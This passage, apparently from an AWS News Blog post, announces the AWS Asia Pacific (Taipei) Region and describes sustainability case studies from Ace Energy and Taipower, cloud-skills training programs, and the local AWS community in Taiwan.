
Supporting sustainable innovation in Taiwan

As Taiwan progresses toward its goal of net-zero emissions by 2050, AWS Cloud solutions are empowering organizations to enhance operational efficiency while reducing environmental impact. The new AWS Asia Pacific (Taipei) Region incorporates the AWS commitment to sustainability, helping organizations meet both technical and environmental objectives.

Ace Energy is a pioneer in Taiwan’s energy management sector. Since 2013, Ace Energy has been using AWS services such as Amazon Simple Storage Service (Amazon S3), Amazon Elastic Compute Cloud (Amazon EC2), and AWS IoT Core to provide innovative energy solutions through their Energy Saving Performance Contract model. Ace Energy has deployed energy management solutions across 1,000 locations, helped a semiconductor manufacturer reduce steam consumption by 65 percent, achieved 22 million new Taiwan dollars in annual energy savings, and decreased carbon emissions by 8,000 tons through their waste heat recovery technology.

Taiwan Power Company (Taipower) is Taiwan’s state power utility and has revolutionized its operations through AWS since 2018. By implementing smart grid technologies with drones, robotics, and virtual reality for smart patrol, Taipower has enhanced customer experience through the “Taiwan Power” application. The company has improved operational efficiency through data-driven decision-making and earned six consecutive Platinum Awards in the Corporate Sustainability category at the Taiwan Corporate Sustainability Awards.

Building cloud skills together

Since 2014, AWS has built comprehensive programs for cloud education and skills development in Taiwan. For example, educational programs such as AWS Academy, AWS Educate, and AWS Skill Builder have helped train more than 200,000 people in Taiwan on cloud skills. These programs will expand alongside our infrastructure investments to build a foundation for Taiwan’s digital future.

Taiwan boasts a vibrant AWS community that welcomes your involvement. Take part in knowledge-sharing and networking at local AWS User Groups in Taipei, engage with the four celebrated AWS Heroes in Taiwan, or consider becoming part of the growing community of AWS enthusiasts by joining the ranks of the 17 AWS Community Builders already contributing to Taiwan’s cloud ecosystem. All these community connections provide valuable opportunities to accelerate your cloud journey through local expertise and collaborative learning.

Stay tuned
The AWS Asia Pacific (Taipei) Region is ready to support your business. You can find a detailed list of the services available in this Region on the AWS Services by Region page. For news about AWS Region openings, check out the Regional news of the AWS News Blog.

Start building on the Asia Pacific (Taipei) Region now.

–Betty